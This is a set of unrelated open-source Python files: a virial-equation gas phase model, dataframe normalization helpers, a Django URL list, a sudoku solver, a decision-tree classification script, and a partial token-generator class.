LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
__all__ = ['VirialCorrelationsPitzerCurl', 'VirialGas']
from fluids.numerics import newton
from chemicals.utils import log
from thermo.heat_capacity import HeatCapacityGas
from .phase import Phase
from chemicals.virial import BVirial_Pitzer_Curl, Z_from_virial_density_form
class VirialCorrelationsPitzerCurl(object):
def __init__(self, Tcs, Pcs, omegas):
self.Tcs = Tcs
self.Pcs = Pcs
self.omegas = omegas
self.N = len(Tcs)
def C_pures(self, T):
return [0.0]*self.N
def dC_dT_pures(self, T):
return [0.0]*self.N
def d2C_dT2_pures(self, T):
return [0.0]*self.N
def C_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
# Full return should be (Ciij, Ciji, Cjii), (Cijj, Cjij, Cjji)
# but due to symmetry there is only those two matrices
return Ciij, Cijj
def dC_dT_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
return Ciij, Cijj
def d2C_dT2_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
return Ciij, Cijj
def B_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i]) for i in range(self.N)]
def dB_dT_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i], 1) for i in range(self.N)]
def B_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def dB_dT_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def B_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.B_pures(T)
B_interactions = self.B_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
def dB_dT_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.dB_dT_pures(T)
B_interactions = self.dB_dT_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
def d2B_dT2_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i], 2) for i in range(self.N)]
def d2B_dT2_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def d2B_dT2_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.d2B_dT2_pures(T)
B_interactions = self.d2B_dT2_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
class VirialGas(Phase):
phase = 'g'
force_phase = 'g'
is_gas = True
is_liquid = False
ideal_gas_basis = True
pure_references = ('HeatCapacityGases',)
pure_reference_types = (HeatCapacityGas, )
def __init__(self, model, HeatCapacityGases=None, Hfs=None, Gfs=None,
T=None, P=None, zs=None):
self.model = model
self.HeatCapacityGases = HeatCapacityGases
self.Hfs = Hfs
self.Gfs = Gfs
if Hfs is not None and Gfs is not None and None not in Hfs and None not in Gfs:
self.Sfs = [(Hfi - Gfi)/298.15 for Hfi, Gfi in zip(Hfs, Gfs)]
else:
self.Sfs = None
for i in (zs, HeatCapacityGases, Hfs, Gfs):
if i is not None:
self.N = len(i)
break
if zs is not None:
self.zs = zs
if T is not None:
self.T = T
if P is not None:
self.P = P
if T is not None and P is not None and zs is not None:
Z = Z_from_virial_density_form(T, P, self.B(), self.C())
self._V = Z*self.R*T/P
def V(self):
return self._V
def dP_dT(self):
r'''
.. math::
\left(\frac{\partial P}{\partial T}\right)_{V} = \frac{R \left(T
\left(V \frac{d}{d T} B{\left(T \right)} + \frac{d}{d T} C{\left(T
\right)}\right) + V^{2} + V B{\left(T \right)} + C{\left(T \right)}
\right)}{V^{3}}
'''
try:
return self._dP_dT
except:
pass
T, V = self.T, self._V
self._dP_dT = dP_dT = self.R*(T*(V*self.dB_dT() + self.dC_dT()) + V*(V + self.B()) + self.C())/(V*V*V)
return dP_dT
def dP_dV(self):
r'''
.. math::
\left(\frac{\partial P}{\partial V}\right)_{T} =
- \frac{R T \left(V^{2} + 2 V B{\left(T \right)} + 3 C{\left(T
\right)}\right)}{V^{4}}
'''
try:
return self._dP_dV
except:
pass
T, V = self.T, self._V
self._dP_dV = dP_dV = -self.R*T*(V*V + 2.0*V*self.B() + 3.0*self.C())/(V*V*V*V)
return dP_dV
def d2P_dTdV(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial V\partial T}\right)_{T} =
- \frac{R \left(2 T V \frac{d}{d T} B{\left(T \right)} + 3 T
\frac{d}{d T} C{\left(T \right)} + V^{2} + 2 V B{\left(T \right)}
+ 3 C{\left(T \right)}\right)}{V^{4}}
'''
try:
return self._d2P_dTdV
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dTdV = d2P_dTdV = -self.R*(2.0*T*V*self.dB_dT() + 3.0*T*self.dC_dT()
+ V2 + 2.0*V*self.B() + 3.0*self.C())/(V2*V2)
return d2P_dTdV
def d2P_dV2(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial V^2}\right)_{T} =
\frac{2 R T \left(V^{2} + 3 V B{\left(T \right)}
+ 6 C{\left(T \right)}\right)}{V^{5}}
'''
try:
return self._d2P_dV2
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dV2 = d2P_dV2 = 2.0*self.R*T*(V2 + 3.0*V*self.B() + 6.0*self.C())/(V2*V2*V)
return d2P_dV2
def d2P_dT2(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial T^2}\right)_{V} =
\frac{R \left(T \left(V \frac{d^{2}}{d T^{2}} B{\left(T \right)}
+ \frac{d^{2}}{d T^{2}} C{\left(T \right)}\right) + 2 V \frac{d}{d T}
B{\left(T \right)} + 2 \frac{d}{d T} C{\left(T \right)}\right)}{V^{3}}
'''
try:
return self._d2P_dT2
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dT2 = d2P_dT2 = self.R*(T*(V*self.d2B_dT2() + self.d2C_dT2())
+ 2.0*V*self.dB_dT() + 2.0*self.dC_dT())/(V*V*V)
return d2P_dT2
def H_dep(self):
r'''
.. math::
H_{dep} = \frac{R T^{2} \left(2 V \frac{d}{d T} B{\left(T \right)}
+ \frac{d}{d T} C{\left(T \right)}\right)}{2 V^{2}} - R T \left(-1
+ \frac{V^{2} + V B{\left(T \right)} + C{\left(T \right)}}{V^{2}}
\right)
'''
'''
from sympy import *
Z, R, T, V, P = symbols('Z, R, T, V, P')
B, C = symbols('B, C', cls=Function)
base =Eq(P*V/(R*T), 1 + B(T)/V + C(T)/V**2)
P_sln = solve(base, P)[0]
Z = P_sln*V/(R*T)
# Two ways to compute H_dep
Hdep2 = R*T - P_sln*V + integrate(P_sln - T*diff(P_sln, T), (V, oo, V))
Hdep = -R*T*(Z-1) -integrate(diff(Z, T)/V, (V, oo, V))*R*T**2
'''
try:
return self._H_dep
except:
pass
T, V = self.T, self._V
V2 = V*V
RT = self.R*T
self._H_dep = H_dep = RT*(T*(2.0*V*self.dB_dT() + self.dC_dT())/(2.0*V2)
- (-1.0 + (V2 + V*self.B() + self.C())/V2))
return H_dep
def dH_dep_dT(self):
r'''
.. math::
\frac{\partial H_{dep}}{\partial T} = \frac{R \left(2 T^{2} V
\frac{d^{2}}{d T^{2}} B{\left(T \right)} + T^{2} \frac{d^{2}}{d T^{2}}
C{\left(T \right)} + 2 T V \frac{d}{d T} B{\left(T \right)}
- 2 V B{\left(T \right)} - 2 C{\left(T \right)}\right)}{2 V^{2}}
'''
try:
return self._dH_dep_dT
except:
pass
T, V = self.T, self._V
self._dH_dep_dT = dH_dep_dT = (self.R*(2.0*T*T*V*self.d2B_dT2() + T*T*self.d2C_dT2()
+ 2.0*T*V*self.dB_dT() - 2.0*V*self.B() - 2.0*self.C())/(2.0*V*V))
return dH_dep_dT
def S_dep(self):
r'''
.. math::
S_{dep} = \frac{R \left(- T \frac{d}{d T} C{\left(T \right)} + 2 V^{2}
\ln{\left(\frac{V^{2} + V B{\left(T \right)} + C{\left(T \right)}}
{V^{2}} \right)} - 2 V \left(T \frac{d}{d T} B{\left(T \right)}
+ B{\left(T \right)}\right) - C{\left(T \right)}\right)}{2 V^{2}}
'''
'''
dP_dT = diff(P_sln, T)
S_dep = integrate(dP_dT - R/V, (V, oo, V)) + R*log(Z)
'''
try:
return self._S_dep
except:
pass
T, V = self.T, self._V
V2 = V*V
self._S_dep = S_dep = (self.R*(-T*self.dC_dT() + 2*V2*log((V2 + V*self.B() + self.C())/V**2)
- 2*V*(T*self.dB_dT() + self.B()) - self.C())/(2*V2))
return S_dep
def dS_dep_dT(self):
r'''
.. math::
\frac{\partial S_{dep}}{\partial T} = \frac{R \left(2 V^{2} \left(V
\frac{d}{d T} B{\left(T \right)} + \frac{d}{d T} C{\left(T \right)}
\right) - \left(V^{2} + V B{\left(T \right)} + C{\left(T \right)}
\right) \left(T \frac{d^{2}}{d T^{2}} C{\left(T \right)} + 2 V
\left(T \frac{d^{2}}{d T^{2}} B{\left(T \right)} + 2 \frac{d}{d T}
B{\left(T \right)}\right) + 2 \frac{d}{d T} C{\left(T \right)}
\right)\right)}{2 V^{2} \left(V^{2} + V B{\left(T \right)}
+ C{\left(T \right)}\right)}
'''
try:
return self._dS_dep_dT
except:
pass
T, V = self.T, self._V
V2 = V*V
self._dS_dep_dT = dS_dep_dT = (self.R*(2.0*V2*(V*self.dB_dT() + self.dC_dT()) - (V2 + V*self.B() + self.C())*(T*self.d2C_dT2()
+ 2.0*V*(T*self.d2B_dT2() + 2.0*self.dB_dT()) + 2.0*self.dC_dT()))/(2.0*V2*(V2 + V*self.B() + self.C())))
return dS_dep_dT
def to_TP_zs(self, T, P, zs):
new = self.__class__.__new__(self.__class__)
new.T = T
new.P = P
new.zs = zs
new.N = self.N
new.HeatCapacityGases = self.HeatCapacityGases
new.model = self.model
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
Z = Z_from_virial_density_form(T, P, new.B(), new.C())
new._V = Z*self.R*T/P
return new
def to(self, zs, T=None, P=None, V=None):
new = self.__class__.__new__(self.__class__)
new.zs = zs
new.N = self.N
new.HeatCapacityGases = self.HeatCapacityGases
new.model = model = self.model
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
if T is not None:
new.T = T
if P is not None:
new.P = P
Z = Z_from_virial_density_form(T, P, new.B(), new.C())
new._V = Z*self.R*T/P
elif V is not None:
P = new.P = self.R*T*(V*V + V*new.B() + new.C())/(V*V*V)
new._V = V
elif P is not None and V is not None:
new.P = P
# PV specified, solve for T
def err(T):
# Solve for P matching; probably there is a better solution here that does not
# require the cubic solution but this works for now
# TODO: instead of using self.to_TP_zs to allow calculating B and C,
# they should be functional
new_tmp = self.to_TP_zs(T=T, P=P, zs=zs)
B = new_tmp.B()
C = new_tmp.C()
x2 = V*V + V*B + C
x3 = self.R/(V*V*V)
P_err = T*x2*x3 - P
dP_dT = x3*(T*(V*new_tmp.dB_dT() + new_tmp.dC_dT()) + x2)
return P_err, dP_dT
T_ig = P*V/self.R # guess
T = newton(err, T_ig, fprime=True, xtol=1e-15)
new.T = T
else:
raise ValueError("Two of T, P, or V are needed")
return new
def B(self):
try:
return self._B
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.B_pures(T)[0]
zs = self.zs
B_matrix = self.model.B_matrix(T)
B = 0.0
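        # mixture second virial coefficient via the quadratic mixing rule: B = sum_i sum_j z_i*z_j*B_ij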
for i in range(N):
B_tmp = 0.0
row = B_matrix[i]
for j in range(N):
                B_tmp += zs[j]*row[j]
B += zs[i]*B_tmp
self._B = B
return B
def dB_dT(self):
try:
return self._dB_dT
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.dB_dT_pures(T)[0]
zs = self.zs
dB_dT_matrix = self.model.dB_dT_matrix(T)
dB_dT = 0.0
for i in range(N):
dB_dT_tmp = 0.0
row = dB_dT_matrix[i]
for j in range(N):
                dB_dT_tmp += zs[j]*row[j]
dB_dT += zs[i]*dB_dT_tmp
self._dB_dT = dB_dT
return dB_dT
def d2B_dT2(self):
try:
return self._d2B_dT2
except:
pass
N = self.N
T = self.T
if N == 1:
return self.model.d2B_dT2_pures(T)[0]
zs = self.zs
d2B_dT2_matrix = self.model.d2B_dT2_matrix(T)
d2B_dT2 = 0.0
for i in range(N):
d2B_dT2_tmp = 0.0
row = d2B_dT2_matrix[i]
for j in range(N):
                d2B_dT2_tmp += zs[j]*row[j]
d2B_dT2 += zs[i]*d2B_dT2_tmp
self._d2B_dT2 = d2B_dT2
return d2B_dT2
def C(self):
try:
return self._C
except:
pass
T = self.T
zs = self.zs
C_pures = self.model.C_pures(T)
Ciij, Cijj = self.model.C_interactions(T)
C = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
Cval = C_pures[i]
elif i == j:
Cval = Ciij[i][j]
else:
Cval = Cijj[i][j]
C += zs[i]*zs[j]*zs[k]*Cval
self._C = C
return C
def dC_dT(self):
try:
return self._dC_dT
except:
pass
T = self.T
zs = self.zs
dC_dT_pures = self.model.dC_dT_pures(T)
dC_dTiij, dC_dTijj = self.model.dC_dT_interactions(T)
dC_dT = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
dC_dTval = dC_dT_pures[i]
elif i == j:
dC_dTval = dC_dTiij[i][j]
else:
dC_dTval = dC_dTijj[i][j]
dC_dT += zs[i]*zs[j]*zs[k]*dC_dTval
self._dC_dT = dC_dT
return dC_dT
def d2C_dT2(self):
try:
return self._d2C_dT2
except:
pass
T = self.T
zs = self.zs
d2C_dT2_pures = self.model.d2C_dT2_pures(T)
d2C_dT2iij, d2C_dT2ijj = self.model.d2C_dT2_interactions(T)
d2C_dT2 = 0.0
N = self.N
for i in range(N):
for j in range(N):
# poling 5-4.3b should be able to be used to take out the k loop?
for k in range(N):
if i == j == k:
d2C_dT2val = d2C_dT2_pures[i]
elif i == j:
d2C_dT2val = d2C_dT2iij[i][j]
else:
d2C_dT2val = d2C_dT2ijj[i][j]
d2C_dT2 += zs[i]*zs[j]*zs[k]*d2C_dT2val
self._d2C_dT2 = d2C_dT2
return d2C_dT2
| StarcoderdataPython |
1728565 | <gh_stars>1-10
import pandas as pd
import numpy as np
'''
This module contains several normalization methods.
See ReadMe.md for usage example.
'''
def zero_one_normalize(df: pd.DataFrame, excluded_colnames: list = None) -> pd.DataFrame:
"""
Applies the MinMaxScaler from the module sklearn.preprocessing to find
the min and max of each column and transforms the values into the range
of [0,1]. The transformation is given by::
X_scaled = (X - X.min(axis=0)) / ranges
where::
range = X.max(axis=0) - X.min(axis=0)
Note: In case multiple dataframes are used (i.e., several partitions of
the dataset in training and testing), make sure that all of them will
be passed to this method at once, and as one single dataframe. Otherwise,
the normalization will be carried out on local (as opposed to global)
extrema, which is incorrect.
:param df: The dataframe to be normalized.
:param excluded_colnames: The name of non-numeric columns (e.g. TimeStamp,
ID etc.) that must be excluded before normalization takes place.
They will be added back to the normalized data.
:return: The same dataframe as input, with the label column unchanged,
except that now the numerical values are transformed into a [0, 1] range.
"""
from sklearn.preprocessing import MinMaxScaler
excluded_colnames = excluded_colnames if excluded_colnames else []
colnames_original_order = list(df)
# Separate data (numeric) from those to be excluded (ids and class_labels)
included_cnames = [colname for colname in list(df) if colname not in excluded_colnames]
# Exclude all non-numeric columns
df_numeric = df[included_cnames].select_dtypes(include=np.number)
# set-difference between the original and numeric columns
excluded_cnames = list(set(colnames_original_order) - set(list(df_numeric)))
df_excluded = df[excluded_cnames]
# prepare normalizer and normalize
scaler = MinMaxScaler()
res_ndarray = scaler.fit_transform(df_numeric)
df_numeric = pd.DataFrame(res_ndarray, columns=list(df_numeric), dtype=float)
# Reset the indices (so that they match)
df_excluded.reset_index()
df_numeric.reset_index()
# Add the excluded columns back
df_norm = df_excluded.join(df_numeric)
    # Restore the original order of columns
df_norm = df_norm[colnames_original_order]
return df_norm
def negativeone_one_normalize(df: pd.DataFrame, excluded_colnames: list = None) -> pd.DataFrame:
"""
Applies the `MinMaxScaler` from the module `sklearn.preprocessing` to find
the min and max of each column and transforms the values into the range
of [-1,1]. The transformation is given by::
X_scaled = scale * X - 1 - X.min(axis=0) * scale
where::
scale = 2 / (X.max(axis=0) - X.min(axis=0))
Note: In case multiple dataframes are used (i.e., several partitions of
the dataset in training and testing), make sure that all of them will
be passed to this method at once, and as one single dataframe. Otherwise,
the normalization will be carried out on local (as opposed to global)
extrema, which is incorrect.
:param df: The dataframe to be normalized.
:param excluded_colnames: The name of non-numeric columns (e.g. TimeStamp,
ID etc) that must be excluded before normalization takes place.
They will be added back to the normalized data.
:return: The same dataframe as input, with the label column unchanged,
except that now the numerical values are transformed into a [-1, 1] range.
"""
from sklearn.preprocessing import MinMaxScaler
excluded_colnames = excluded_colnames if excluded_colnames else []
colnames_original_order = list(df)
# Separate data (numeric) from those to be excluded (ids and class_labels)
included_cnames = [colname for colname in list(df) if colname not in excluded_colnames]
# Exclude all non-numeric columns
df_numeric = df[included_cnames].select_dtypes(include=np.number)
# set-difference between the original and numeric columns
excluded_cnames = list(set(colnames_original_order) - set(list(df_numeric)))
df_excluded = df[excluded_cnames]
# prepare normalizer and normalize
scaler = MinMaxScaler((-1, 1))
res_ndarray = scaler.fit_transform(df_numeric)
df_numeric = pd.DataFrame(res_ndarray, columns=list(df_numeric), dtype=float)
# Reset the indices (so that they match)
df_excluded.reset_index()
df_numeric.reset_index()
# Add the excluded columns back
df_norm = df_excluded.join(df_numeric)
    # Restore the original order of columns
df_norm = df_norm[colnames_original_order]
return df_norm
def standardize(df: pd.DataFrame, excluded_colnames: list = None) -> pd.DataFrame:
"""
Applies the StandardScaler from the module sklearn.preprocessing by
removing the mean and scaling to unit variance. The transformation
is given by:
.. math::
z = (x - u) / s
where `x` is a feature vector, `u` is the mean of the vector, and `s`
represents its standard deviation.
Note: In case multiple dataframes are used (i.e., several partitions of
the dataset in training and testing), make sure that all of them will
be passed to this method at once, and as one single dataframe. Otherwise,
the normalization will be carried out on local (as opposed to global)
extrema, which is incorrect.
:param df: The dataframe to be normalized.
:param excluded_colnames: The name of non-numeric columns (e.g. TimeStamp,
ID etc) that must be excluded before normalization takes place. They will
be added back to the normalized data.
:return: The same dataframe as input, with the label column unchanged,
except that now the numeric values are transformed into a range with mean
at 0 and unit standard deviation.
"""
from sklearn.preprocessing import StandardScaler
excluded_colnames = excluded_colnames if excluded_colnames else []
colnames_original_order = list(df)
# Separate data (numeric) from those to be excluded (ids and class_labels)
included_cnames = [colname for colname in list(df) if colname not in excluded_colnames]
# Exclude all non-numeric columns
df_numeric = df[included_cnames].select_dtypes(include=np.number)
# set-difference between the original and numeric columns
excluded_cnames = list(set(colnames_original_order) - set(list(df_numeric)))
df_excluded = df[excluded_cnames]
# prepare normalizer and normalize
scaler = StandardScaler()
res_ndarray = scaler.fit_transform(df_numeric)
df_numeric = pd.DataFrame(res_ndarray, columns=list(df_numeric), dtype=float)
# Reset the indices (so that they match)
df_excluded.reset_index()
df_numeric.reset_index()
# Add the excluded columns back
df_norm = df_excluded.join(df_numeric)
    # Restore the original order of columns
df_norm = df_norm[colnames_original_order]
return df_norm
def robust_standardize(df: pd.DataFrame, excluded_colnames: list = None) -> pd.DataFrame:
"""
Applies the RobustScaler from the module sklearn.preprocessing by
removing the median and scaling the data according to the quantile
range (IQR). This transformation is robust to outliers.
Note: In case multiple dataframes are used (i.e., several partitions of
the dataset in training and testing), make sure that all of them will
be passed to this method at once, and as one single dataframe. Otherwise,
the normalization will be carried out on local (as opposed to global)
extrema, hence unrepresentative IQR. This is a bad practice.
:param df: The dataframe to be normalized.
    :param excluded_colnames: The name of non-numeric columns (e.g., TimeStamp,
ID etc.) that must be excluded before normalization takes place.
They will be added back to the normalized data.
:return: The same dataframe as input, with the label column unchanged,
except that now the numerical values are transformed into new range
determined by IQR.
"""
from sklearn.preprocessing import RobustScaler
excluded_colnames = excluded_colnames if excluded_colnames else []
colnames_original_order = list(df)
# Separate data (numeric) from those to be excluded (ids and class_labels)
included_cnames = [colname for colname in list(df) if colname not in excluded_colnames]
# Exclude all non-numeric columns
df_numeric = df[included_cnames].select_dtypes(include=np.number)
# set-difference between the original and numeric columns
excluded_cnames = list(set(colnames_original_order) - set(list(df_numeric)))
df_excluded = df[excluded_cnames]
# prepare normalizer and normalize
scaler = RobustScaler()
res_ndarray = scaler.fit_transform(df_numeric)
df_numeric = pd.DataFrame(res_ndarray, columns=list(df_numeric), dtype=float)
# Reset the indices (so that they match)
df_excluded.reset_index()
df_numeric.reset_index()
# Add the excluded columns back
df_norm = df_excluded.join(df_numeric)
    # Restore the original order of columns
df_norm = df_norm[colnames_original_order]
return df_norm
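# Illustrative usage sketch (not part of the original module): the column names
# and values below are hypothetical; non-numeric columns such as "id" are passed
# through `excluded_colnames` so they survive normalization untouched.
if __name__ == "__main__":
    _demo = pd.DataFrame({
        "id": ["a", "b", "c", "d"],
        "x": [1.0, 2.0, 3.0, 4.0],
        "y": [10.0, 20.0, 30.0, 40.0],
    })
    print(zero_one_normalize(_demo, excluded_colnames=["id"]))
    print(standardize(_demo, excluded_colnames=["id"]))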
| StarcoderdataPython |
3203062 | <gh_stars>1-10
from django.urls import path
# from django.urls import include
from . import views
urlpatterns = [
path('index.html',views.index,name='index'),
path('',views.index,name='index'),
] | StarcoderdataPython |
1713365 | <reponame>jaredlwong/sudoku
"""This solution is a simple bfs with grids being copied using np.array"""
from __future__ import annotations
from typing import FrozenSet
from typing import Iterator
from typing import List
from typing import NewType
from typing import Optional
from typing import Tuple
import time
import sys
import numpy as np
class SudokuParser(object):
@staticmethod
def read_from_file(fn):
pass
@staticmethod
def parse_str(s):
grid = [[int(c) for c in row] for row in s.split('\n') if row]
np_grid = np.zeros(81)
for i in range(9):
for j in range(9):
np_grid[i*9+j] = grid[i][j]
return Sudoku(np_grid)
class Sudoku(object):
indexes = (1, 2, 3, 4, 5, 6, 7, 8, 9)
def __init__(self, grid):
self._grid = grid
def get(self, row: int, col: int) -> int:
return self._grid[(row-1)*9+(col-1)]
def copy_and_set(self, row: int, col: int, v: int) -> Sudoku:
new_grid = self._grid.copy()
new_grid[(row-1)*9+(col-1)] = v
return Sudoku(new_grid)
def row(self, r: int) -> Iterator[int]:
"""Return row (1-indexed)"""
return (self.get(r, c) for c in Sudoku.indexes)
def col(self, c: int) -> Iterator[int]:
"""Return row (1-indexed)"""
return (self.get(r, c) for r in Sudoku.indexes)
def rows(self) -> Iterator[Iterator[int]]:
"""Return each row for each yield"""
for r in Sudoku.indexes:
yield self.row(r)
def cols(self) -> Iterator[Iterator[int]]:
"""Return each col for each yield"""
for c in Sudoku.indexes:
yield self.col(c)
def box(self, b: int) -> Iterator[int]:
r_box = (b - 1) // 3
c_box = (b - 1) % 3
for r in range(r_box * 3, r_box * 3 + 3):
for c in range(c_box * 3, c_box * 3 + 3):
yield self.get(r+1, c+1)
def boxes(self) -> Iterator[Iterator[int]]:
for b in Sudoku.indexes:
yield self.box(b)
class SudokuSolver(object):
@staticmethod
def grp_okay(grp: Iterator[int]) -> bool:
grp_minus_zeros = [x for x in grp if x != 0]
return len(grp_minus_zeros) == len(set(grp_minus_zeros))
@staticmethod
def sudoku_possible(sudoku: Sudoku) -> bool:
if not all(SudokuSolver.grp_okay(row) for row in sudoku.rows()):
return False
if not all(SudokuSolver.grp_okay(col) for col in sudoku.cols()):
return False
if not all(SudokuSolver.grp_okay(box) for box in sudoku.boxes()):
return False
return True
@staticmethod
def sudoku_complete(sudoku: Sudoku) -> bool:
return all(c != 0 for row in sudoku.rows() for c in row)
@staticmethod
def sudoku_gen_next(sudoku: Sudoku) -> List[Sudoku]:
position = SudokuSolver.next_open(sudoku)
if not position:
return []
r, c = position
return [sudoku.copy_and_set(r, c, k) for k in range(1, 10)]
@staticmethod
def next_open(sudoku: Sudoku) -> Optional[Tuple[int, int]]:
for i in range(1, 10):
for j in range(1, 10):
if sudoku.get(i, j) == 0:
return i, j
return None
@staticmethod
def sudoku_solve(sudoku: Sudoku) -> Optional[Sudoku]:
queue = SudokuSolver.sudoku_gen_next(sudoku)
while len(queue) > 0:
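            # pop() removes the last-appended candidate grid (LIFO), so the most recently generated branch is explored first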
s = queue.pop()
if not SudokuSolver.sudoku_possible(s):
continue
if SudokuSolver.sudoku_complete(s):
return s
queue.extend(SudokuSolver.sudoku_gen_next(s))
return None
# sudoku_puzzle = '''
# 070050010
# 000028600
# 200000000
# 000006000
# 530000007
# 080090040
# 600000081
# 005300000
# 000009370
# '''
sudoku_puzzle = '''
801340000
430800107
000060003
208050009
009000700
600070804
300010000
105006042
000024308
'''
if __name__ == '__main__':
sudoku: Sudoku = SudokuParser.parse_str(sudoku_puzzle)
solved: Optional[Sudoku] = SudokuSolver.sudoku_solve(sudoku)
if solved:
print(solved._grid)
else:
print(sudoku._grid)
| StarcoderdataPython |
1694599 | <reponame>polymathnexus5/solid-rotary-phone<filename>src/decision_tree.py
from sklearn import datasets
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.preprocessing import LabelEncoder
from keras.utils import np_utils
import pandas as pd
import numpy as np
import matrix_plot
import matplotlib.pyplot as plt
seed = 8
np.random.seed(seed)
def feature_normalize(dataset):
return (dataset - np.mean(dataset, axis=0))/np.std(dataset, axis=0)
df = pd.read_excel('data/all_data_2.xlsx', header=None)
input = df.as_matrix()
#X=input.reshape((150,25))
X_norm = feature_normalize(input).reshape((150,25))
#X_norm = feature_normalize(input.reshape((150,25)))
X = X_norm
Y = np.ones((150), np.float32)
for i in range(0,Y.shape[0],50):
if (i == 0):
Y[0:50] = Y[0:50]*0
if (i == 0):
Y[100:] = Y[100:]*2
'''
#X=input.reshape((75,50))
X_norm = feature_normalize(input).reshape((75,50))
X = X_norm
Y = np.ones((75), np.float32)
for i in range(0,Y.shape[0],25):
if (i == 0):
Y[0:25] = Y[0:25]*0
if (i == 0):
Y[50:] = Y[50:]*2
'''
class_names = ['man','hand','eye']
X_train, X_test, y_train, y_test = train_test_split(X, Y)
dtree_model = DecisionTreeClassifier(max_depth = 4).fit(X_train, y_train)
dtree_predictions = dtree_model.predict(X_test)
cm = confusion_matrix(y_test, dtree_predictions)
# Plot normalized confusion matrix
matrix_plot.plot_confusion_matrix(y_test, dtree_predictions, classes=class_names, normalize=True,
title='Decision Tree From Session 1 Data')
plt.show()
count = 0
for i in range (y_test.shape[0]):
if y_test[i] == dtree_predictions[i]:
#print(dtree_predictions[i])
#print(y_test[i])
count += 1
#print(count)
#print(count)
#print(y_test.shape[0])
print("Train Count: ", y_train.shape)
print("============================")
print("Test Count: ", y_test.shape)
print("============================")
print("Results: ", dtree_predictions)
print("============================")
print("True Values: ", y_test)
print("============================")
print("accuracy: ", count*100/y_test.shape[0])
print("============================")
df2 = pd.read_excel('data/all_data.xlsx', header=None)
input2 = df2.as_matrix()
#X2=input2.reshape((144,25))
X_norm2 = feature_normalize(input2).reshape((144,25))
#X_norm2 = feature_normalize(input2.reshape((144,25)))
X2 = X_norm2
Y2 = np.ones((144), np.float32)
for i in range(0,Y2.shape[0],48):
if (i == 0):
Y2[0:48] = Y2[0:48]*2
if (i == 0):
Y2[96:] = Y2[96:]*0
'''
#X2=input2.reshape((72,50))
X_norm2 = feature_normalize(input2).reshape((72,50))
X2 = X_norm2
Y2 = np.ones((72), np.float32)
for i in range(0,Y2.shape[0],24):
if (i == 0):
Y2[0:24] = Y2[0:24]*2
if (i == 0):
Y2[48:] = Y2[48:]*0
'''
X_train2, X_test2, y_train2, y_test2 = train_test_split(X2, Y2, test_size=0.9)
dtree_predictions2 = dtree_model.predict(X_test2)
cm2 = confusion_matrix(y_test2, dtree_predictions2)
# Plot normalized confusion matrix
matrix_plot.plot_confusion_matrix(y_test2, dtree_predictions2, classes=class_names, normalize=True,
title='Decision Tree From session 1 Used On Session 2')
plt.show()
count2 = 0
for i in range (y_test2.shape[0]):
if y_test2[i] == dtree_predictions2[i]:
#print(dtree_predictions[i])
#print(y_test[i])
count2 += 1
#print(count)
#print(count)
#print(y_test.shape[0])
print("Results: ", dtree_predictions2)
print("============================")
print("True Values: ", y_test2)
print("============================")
print("accuracy: ", count*100/y_test2.shape[0])
print("============================") | StarcoderdataPython |
4823122 | <reponame>peyang-Celeron/ServerTemplate.py<filename>src/utils/token.py
import os
from secrets import token_bytes
from blake3 import blake3
class Token:
def __init__(self, file):
self.file = file
self.token = None
@property
def loaded(self):
if not os.path.exists(self.file):
return False
with open(self.file, "rb") as r:
self.token = r.read().decode("utf-8")
return True
def save(self, token):
with open(self.file, "w") as r:
r.write(token)
def generate(self):
if self.token is not None:
return self.token
if os.path.exists(self.file) and self.loaded:
return self.token
token = token_bytes(32)
hash_token = blake3(token).hexdigest()
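        # persist only the blake3 digest of the random token; the raw 32 bytes never hit disk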
self.save(hash_token)
self.token = hash_token
return hash_token
def validate(self, token):
